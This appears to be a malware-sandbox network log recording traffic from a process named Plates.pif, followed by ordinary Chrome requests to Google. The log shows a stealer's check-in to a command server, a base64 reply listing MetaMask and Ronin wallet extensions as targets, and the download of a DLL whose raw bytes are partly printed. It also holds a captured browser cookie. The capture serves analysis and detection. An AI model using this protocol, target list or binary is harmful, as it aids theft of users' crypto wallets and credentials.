2024-11-01 19:53:04 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 36 31 38 61 61 32 64 37 62 63 36 64 61 61 35 30 33 33 66 39 31 39 32 39 35 32 37 32 38 63 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 Data Ascii: ------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="token"34618aa2d7bc6daa5033f9192952728c------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------FCAAEBFHJJDAAKFIECGDCont
2024-11-01 19:53:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:53:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:53:05 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49773	188.245.203.37	443	8460	C:\Users\user\AppData\Local\Temp\646751\Plates.pif

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:06 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 7293 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:53:06 UTC	7293	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 36 31 38 61 61 32 64 37 62 63 36 64 61 61 35 30 33 33 66 39 31 39 32 39 35 32 37 32 38 63 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74 Data Ascii: ------EHIJJDGDHDGDAKFIECFIContent-Disposition: form-data; name="token"34618aa2d7bc6daa5033f9192952728c------EHIJJDGDHDGDAKFIECFIContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------EHIJJDGDHDGDAKFIECFICont
2024-11-01 19:53:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:53:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:53:06 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49774	188.245.203.37	443	8460	C:\Users\user\AppData\Local\Temp\646751\Plates.pif

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:07 UTC	239	OUT	GET /sqlo.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:53:07 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:53:07 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Friday, 01-Nov-2024 19:53:07 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-11-01 19:53:07 UTC	16123	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-11-01 19:53:07 UTC	16384	IN	Data Raw: 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-11-01 19:53:07 UTC	16384	IN	Data Raw: c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-11-01 19:53:07 UTC	16384	IN	Data Raw: 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 Data Ascii: wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$
2024-11-01 19:53:07 UTC	16384	IN	Data Raw: 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b Data Ascii: D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-11-01 19:53:08 UTC	16384	IN	Data Raw: 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-11-01 19:53:08 UTC	16384	IN	Data Raw: c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-11-01 19:53:08 UTC	16384	IN	Data Raw: c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-11-01 19:53:08 UTC	16384	IN	Data Raw: 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b Data Ascii: ,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-11-01 19:53:08 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.11.20	49778	142.251.40.132	443	4316	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:53:12 UTC	815	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjvqc4BCOSvzgEIw7bOAQi9uc4BCO28zgEIu73OAQjWvc4BCMy/zgEYwcvMARi9rs4BGJ2xzgE= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-11-01 19:53:12 UTC	1266	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 19:53:12 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-vrZWnwRL-Rxp6ydSlyTuHg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-01 19:53:12 UTC	1266	IN	Data Raw: 65 36 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 63 68 69 63 61 67 6f 20 62 75 6c 6c 73 22 2c 22 74 72 6f 70 69 63 61 6c 20 73 74 6f 72 6d 73 20 68 75 72 72 69 63 61 6e 65 73 22 2c 22 68 61 6c 6c 6f 77 65 65 6e 20 66 6f 6f 64 20 64 65 61 6c 73 20 63 68 69 70 6f 74 6c 65 22 2c 22 69 6f 73 20 31 38 2e 31 20 61 70 70 6c 65 20 69 6e 74 65 6c 6c 69 67 65 6e 63 65 22 2c 22 76 61 6c 65 6e 63 69 61 20 73 70 61 69 6e 20 66 6c 6f 6f 64 73 20 72 65 64 64 69 74 22 2c 22 6e 65 74 66 6c 69 78 20 74 68 65 20 64 69 70 6c 6f 6d 61 74 20 73 65 61 73 6f 6e 20 33 22 2c 22 62 6f 65 69 6e 67 20 73 74 72 69 6b 65 20 63 6f 6e 74 72 61 63 74 20 6f 66 66 65 72 22 2c 22 6c 61 20 63 6c 69 70 70 65 72 73 20 70 68 6f 65 6e 69 78 20 73 75 6e 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 Data Ascii: e65)]}'["",["chicago bulls","tropical storms hurricanes","halloween food deals chipotle","ios 18.1 apple intelligence","valencia spain floods reddit","netflix the diplomat season 3","boeing strike contract offer","la clippers phoenix suns"],["","","","
2024-11-01 19:53:12 UTC	1266	IN	Data Raw: 31 53 6e 4a 46 56 57 6c 7a 4d 56 46 7a 55 6d 6c 44 65 55 64 48 62 45 46 34 51 32 52 44 62 6b 46 52 56 54 45 30 5a 45 35 78 4e 45 74 4f 4b 7a 4d 32 55 6a 56 7a 59 54 6c 47 4f 56 46 71 63 56 56 68 64 55 6c 52 4b 32 4a 70 53 6e 56 75 51 30 68 4a 4e 44 68 6a 52 53 39 6a 5a 44 42 69 59 57 52 56 62 57 39 43 5a 31 4a 4d 61 55 74 49 4e 6a 59 31 61 6d 52 4a 52 47 5a 5a 55 7a 52 72 63 43 73 79 4f 57 6c 71 55 54 64 54 5a 54 42 77 51 56 46 7a 51 6a 68 7a 59 33 42 53 52 33 56 5a 64 6c 56 69 57 48 68 78 52 7a 68 69 61 47 6c 6e 4f 46 64 4f 5a 32 6c 77 62 32 52 56 51 6d 52 57 65 45 74 42 4d 6d 73 72 4b 32 6c 33 52 6d 56 4f 65 57 70 79 55 56 56 6d 55 57 56 73 61 45 63 32 65 46 6f 34 5a 31 42 4b 62 48 70 44 63 45 31 4c 56 6d 31 76 52 6d 74 43 55 47 46 54 4e 6b 6c 6c 54 55 Data Ascii: 1SnJFVWlzMVFzUmlDeUdHbEF4Q2RDbkFRVTE0ZE5xNEtOKzM2UjVzYTlGOVFqcVVhdUlRK2JpSnVuQ0hJNDhjRS9jZDBiYWRVbW9CZ1JMaUtINjY1amRJRGZZUzRrcCsyOWlqUTdTZTBwQVFzQjhzY3BSR3VZdlViWHhxRzhiaGlnOFdOZ2lwb2RVQmRWeEtBMmsrK2l3RmVOeWpyUVVmUWVsaEc2eFo4Z1BKbHpDcE1LVm1vRmtCUGFTNkllTU
2024-11-01 19:53:12 UTC	1160	IN	Data Raw: 6d 4a 57 54 6d 31 68 53 56 56 55 53 58 52 50 52 32 5a 4c 57 48 4a 34 52 30 31 56 54 6c 4a 35 64 6e 70 71 5a 58 42 51 5a 58 4e 45 5a 57 52 58 5a 48 4e 74 51 33 46 73 64 45 56 46 59 31 5a 34 62 55 31 6d 61 6b 6c 75 4e 31 42 6f 4e 30 45 7a 61 54 41 31 56 55 6b 33 61 30 46 6c 63 6e 42 4a 5a 33 5a 46 4e 31 56 79 4d 55 45 32 4b 31 68 61 5a 47 34 30 53 33 4e 30 4e 6a 4e 70 51 31 4e 79 4f 44 56 57 65 46 6c 78 4d 45 64 55 65 57 74 76 4d 47 4e 74 52 6b 78 73 63 48 70 75 4f 56 67 33 61 32 4e 6a 52 57 5a 59 56 6c 52 6d 53 6d 35 75 4d 48 64 30 56 46 70 7a 4c 32 35 6d 63 44 5a 6c 55 44 4e 49 64 54 67 72 65 47 4e 71 4c 31 42 34 63 55 45 32 52 79 39 6a 55 58 56 5a 63 47 78 6b 65 6d 45 33 4b 79 39 4c 62 6a 67 79 55 33 42 70 4d 48 56 32 4e 6b 4e 68 57 53 74 52 63 46 67 30 Data Ascii: mJWTm1hSVVUSXRPR2ZLWHJ4R01VTlJ5dnpqZXBQZXNEZWRXZHNtQ3FsdEVFY1Z4bU1makluN1BoN0EzaTA1VUk3a0FlcnBJZ3ZFN1VyMUE2K1haZG40S3N0NjNpQ1NyODVWeFlxMEdUeWtvMGNtRkxscHpuOVg3a2NjRWZYVlRmSm5uMHd0VFpzL25mcDZlUDNIdTgreGNqL1B4cUE2Ry9jUXVZcGxkemE3Ky9LbjgyU3BpMHV2NkNhWStRcFg0
2024-11-01 19:53:12 UTC	614	IN	Data Raw: 32 35 66 0d 0a 78 55 32 35 4a 61 6e 51 72 65 44 6c 43 5a 44 67 72 4b 7a 6c 32 54 47 56 30 4f 48 51 77 4c 32 78 36 63 69 39 52 5a 46 64 57 57 48 5a 5a 63 58 5a 68 54 46 46 42 51 55 46 42 51 55 4a 4b 55 6c 55 31 52 58 4a 72 53 6d 64 6e 5a 7a 30 39 4f 67 31 44 61 47 6c 6a 59 57 64 76 49 45 4a 31 62 47 78 7a 53 67 63 6a 59 54 4d 77 5a 44 4d 30 55 6a 5a 6e 63 31 39 7a 63 33 41 39 5a 55 70 36 61 6a 52 30 52 46 41 78 56 47 5a 4a 65 57 70 56 4d 30 31 58 52 44 41 30 61 7a 4e 50 65 55 56 34 54 31 52 4e 4f 56 68 54 51 33 4a 4f 65 56 4e 72 52 30 46 47 4d 57 5a 43 4c 57 64 77 42 33 41 58 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 Data Ascii: 25fxU25JanQreDlCZDgrKzl2TGV0OHQwL2x6ci9RZFdWWHZZcXZhTFFBQUFBQUJKUlU1RXJrSmdnZz09Og1DaGljYWdvIEJ1bGxzSgcjYTMwZDM0UjZnc19zc3A9ZUp6ajR0RFAxVGZJeWpVM01XRDA0azNPeUV4T1RNOVhTQ3JOeVNrR0FGMWZCLWdwB3AX","zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10
2024-11-01 19:53:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.11.20	49779	142.251.40.132	443	4316	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
